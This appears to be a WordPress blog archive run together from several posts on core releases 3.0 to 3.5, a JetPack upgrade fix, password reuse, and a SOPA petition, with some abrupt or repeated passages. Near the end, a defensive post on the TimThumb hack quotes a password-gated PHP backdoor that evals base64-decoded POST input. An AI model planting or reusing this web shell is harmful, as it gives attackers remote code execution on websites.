This update brings some much-needed TLC to the media portion of WordPress. Here’s a quote from the official WordPress update page about the media upgrades:

If you’ve been around WordPress a while, the most dramatic new change you’ll notice is a completely re-imagined flow for uploading photos and creating galleries. Media has long been a friction point and we’ve listened hard and given a lot of thought into crafting this new system. 3.5 includes a new default theme, Twenty Twelve, which has a very clean mobile-first responsive design and works fantastic as a base for a CMS site. Finally we’ve spent a lot of time refreshing the styles of the dashboard, updating everything to be Retina-ready with beautiful high resolution graphics, a new color picker, and streamlining a couple of fewer-used sections of the admin.

CAUTION WHEN UPGRADING:

We always backup our sites before upgrading as a precaution although we haven’t had any updates lately that have broken things. Updates are a tricky thing since every site is using a different combination of themes and plugins. Think how many times you update Windows and you have something go wrong. It can be difficult to make updates that cater to the mass public with so many different setups, so congrats to the WordPress team for releasing such solid updates recently. But with this update, a majority of our sites at Bluehost were broken with a Server 500 error after upgrading through a SimpleScripts update provided by our host. A quick live chat sent us to this page for instructions how to access the site: https://my.bluehost.com/cgi/help/571

After trying to de-activate and re-activate each plugin one-by-one, we found that surprisingly the culprit on every single site was JetPack. This was surprising because the plugin is developed by the Automattic team (the same group that makes WordPress). The solution to fix each site was simple, albeit somewhat time-consuming.

1. Login to your FTP
2. Access your plugins folder for your site
3. Delete JetPack from the list
4. Log into your wp-admin
5. Access the plugins folder
6. Add the JetPack plugin
7. Activate the plugin. Because we deleted the plugin from FTP instead of through wp-admin, your JetPack data is still stored in the database and should be automatically connected when you install and activate the plugin.

As always, we suggest you first have a wordpress backup before playing with the update, particularly since we had some small snags with this update ourselves.

If you’ve been around WordPress a while, the most dramatic new change you’ll notice is a completely re-imagined flow for uploading photos and creating galleries. Media has long been a friction point and we’ve listened hard and given a lot of thought into crafting this new system. 3.5 includes a new default theme, Twenty Twelve, which has a very clean mobile-first responsive design and works fantastic as a base for a CMS site. Finally we’ve spent a lot of time refreshing the styles of the dashboard, updating everything to be Retina-ready with beautiful high resolution graphics, a new color picker, and streamlining a couple of fewer-used sections of the admin.

Many people think that hackers are sneaking around their website code for hours trying to find a way in. Although many hackers are very smart and capable of breaking into even tightly secured websites, the truth is many hackers are lazy. They send a robot out to your site to try entering into holes with the least amount of resistance.

We talked about one hole recently when LinkedIn, Last.fm, and other websites were hacked. When hackers get your account info from those hacked websites, they can often access dozens of other websites you use with the exact same credentials.  Many social media sites, for example, use your email address as your username. So when hackers get your primary email address, they already have half your login information. Then when those hackers get a list of hacked passwords from LinkedIn and other sites that were hacked recently, they may find your password attached to your email address.

People are generally lazy and use the same password on many of the sites they access. But this article from the security website Sucuri.com discusses how that is inexcusable and how hacks can be avoided with a few simple tips:

http://blog.sucuri.net/2012/08/the-password-dilemma-unique-and-complex-is-the-key.html

That is cool because it means you are a part of a much larger community of support and developers. But it also means that your website is a bigger target for hackers and nasty people.

Many WordPress sites have sidebars or popups collecting customer information (such as name, address, email, etc.). Since the news seems to be constantly reminding us about the importance of protecting your users’ information (read about LinkedIn, eHarmony, and Last.fm‘s recent debacles), we recommend you read this excellent blog post over at ProBlogger.net:

http://www.problogger.net/archives/2012/07/18/how-privacy-breach-notification-law-affects-your-blog/

As usual with WordPress updates that have multiple decimals (i.e. X.Y.Z), this is just a minor maintenance and security update, but that does not make it any less important when talking about keeping your site secure.

Here’s a summary of the update:

• Fixes an issue where a theme’s page templates were sometimes not detected.
• Addresses problems with some category permalink structures.
• Better handling for plugins or themes loading JavaScript incorrectly.
• Adds early support for uploading images on iOS 6 devices.
• Allows for a technique commonly used by plugins to detect a network-wide activation.
• Better compatibility with servers running certain versions of PHP (5.2.4, 5.4) or with uncommon setups (safe mode, open_basedir), which had caused warnings or in some cases prevented emails from being sent.

For the complete technical details, read the official WordPress update release here.

This release includes significant improvements to theme customization, custom headers, Twitter embeds, and image captions. You can watch a short video clip explaining the cool new update here:

There are a cool new updates for end users, such as the ability to embed twitter statuses like we did here:

WordPress 3.4 is here! Update your site now to try the new theme customizer, better headers, HTML captions & more: wp.me/pZhYe-BE

— WordPress(@WordPress) June 13, 2012

Here’s the official statement from the WordPress release page:

For Users

The biggest change in 3.4 is the theme customizer which allows you to play around with various looks and settings for your current theme or one you’re thinking about switching to without publishing those changes to the whole world. For themes that support it, you can change colors, backgrounds, and of course custom image headers. We have more planned for the customizer down the road.

Throughout the rest of the admin you’ll notice tweaks to make your everyday life easier. For example, if you have lots of themes we’ve made it quicker to browse them all at once without paging. We’ve made it possible to use images from your media library to populate custom headers, and for you to choose the height and width of your header images.

We’ve expanded our embed support to include tweets: just put a Twitter permalink on its own line in the post editor and we’ll turn it into a beautiful embedded Tweet. And finally, image captions have been improved to allow HTML, like links, in them.

For Developers

There are hundreds of under-the-hood improvements in this release, notably in the XML-RPC, themes, and custom header APIs, and significant performance improvements in WP_Query and the translation system. The Codex has a pretty good summary of the developer features, and you can always dive into Trac directly.

According to the WordPress official statement, here’s what this version includes:

Three external libraries included in WordPress received security updates:

• Plupload (version 1.5.4), which WordPress uses for uploading media.
• SWFUpload, which WordPress previously used for uploading media, and may still be in use by plugins.
• SWFObject, which WordPress previously used to embed Flash content, and may still be in use by plugins and themes.

WordPress 3.3.2 also addresses:

• Limited privilege escalation where a site administrator could deactivate network-wide plugins when running a WordPress network under particular circumstances, disclosed by Jon Cave of our WordPress core security team, and Adam Backstrom.
• Cross-site scripting vulnerability when making URLs clickable, by Jon Cave.
• Cross-site scripting vulnerabilities in redirects after posting comments in older browsers, and when filtering URLs. Thanks to Mauro Gentile for responsibly disclosing these issues to the security team.

Along with this stable version 3.3.2, they have released 3.4 Beta 3 which means stable version 3.4 is sure to come soon. So keep your eyes on our blog to find out right when it happens!

[vimeo 31100268]

Although the talented group of people behind WordPress generally avoid politics given the nature of their global business, this bill has the potential to affect ALL people regardless of their location. The urge all bloggers to be active in the cause to oppose this bill:

Blogging is a form of activism. You can be an agent of change. Some people will tell you that taking action is useless, that online petitions, phone calls to representatives, and other actions won’t change a single mind, especially one that’s been convinced of something by lobbyist dollars. To those people, I repeat the words of Margaret Mead:

Never doubt that a small group of thoughtful, committed citizens can change the world. Indeed, it is the only thing that ever has.

Look at this pretty infographic to understand the process:

• http://americancensorship.org/infographic.html

Please sign these petitions and join the fight for our rights!

• http://americancensorship.org/
• http://fightforthefuture.org/pipa/

WordPress 3.3.1 is now available. This maintenance release fixes 15 issues with WordPress 3.3, as well as a fix for a cross-site scripting vulnerability that affected version 3.3.

Read the official announcement on the WordPress.com website:

• http://wordpress.org/news/2012/01/wordpress-3-3-1/

Read the full log of changes for this version upgrade:

• http://core.trac.wordpress.org/changeset?new=19669%40branches%2F3.3&old=19590%40trunk

Read the troubleshooting guide for WordPress 3.3:

• http://wordpress.org/support/topic/troubleshooting-wordpress-33-master-list

And as always, there are multiple ways you can upgrade:

• Download the .zip file from the WordPress download page
• Click the “Upgrade” link from your dashboard when you log into your website administration area
• Upgrade from your host using a service such as Fantastico or SimpleScripts

In talking with Matt and other WordPress developers at WordCamp earlier this year, they explained to me that WordPress 3.0 was one of the most successful releases they have ever had. In fact, it was strange because they pushed the button to go live and then sat back waiting for complaints to start coming in. When you have a service that affects millions of websites, it’s not unlikely that you will have people complain about features, bugs, or something that breaks their site.

But they just kept waiting…

WordPress 3.0 was relatively bug-free (at least any major issues) and so they didn’t have to release a lot of immediate fixes. But the small, incremental updates continued until July of this year and then they stopped. I continually watched for updates but WordPress just kept releasing something they call “Release Candidates” for developers and other daring people to test before they pushed Version 3.3 out to the public.

Today 3.3 went live today!

I was pleasantly surprised today to see a post in my Google Reader feed announcing that WordPress 3.3 was finally released to the public. And there are several cool features that people might enjoy…

• The new drag-and-drop uploader and combined media upload button above the editor bar
• Hover menus for the navigation (to minimize the dropdown movement of the navigation bar on the left)
• A new toolbar
• Improved co-editing support to show when someone else is editing on the same page as you
• New Tumblr importer.
• And possibly most important for new users… they have improved the usability and help tips when you first log in. Version 3.3 has significant improvements there with pointer tips for new features included in each update, a friendly welcome message for first-time users, and revamped help tabs throughout the interface.
• Improved dashboard experience on the iPad and other tablets with better touch support.

You can read the whole story and watch a cool video on the official WordPress news page.

There are, of course, multiple ways to upgrade your site and it is HIGHLY recommended that you always maintain the latest version of WordPress for security fixes.

• Log into your WordPress site and upgrade when you see the message regarding upgrading (or go to Dashboard –> Updates –> Check for updates)
• Use a service like SimpleScripts or Fantastico that might be installed on your host
• You could of course download the latest version from WordPress and manually upgrade through your server (this is by far the hardest way of upgrading)

if (md5 (md5($_POST[‘p’]))===’xxx8ab2ab.. a4ec61072xxx’)
die (eval ( base64_decode ($_POST[‘c’])));

Yikes! That code essentially receives a password via the “p” POST and if it is correct, it executes any PHP code sent by the attackers in the “c” POST variable.

Better yet, if your theme requires timthumb.php, just replace your version with the latest version (2.8 as of this writing) from the TimThumb Google Code page here: http://code.google.com/p/timthumb/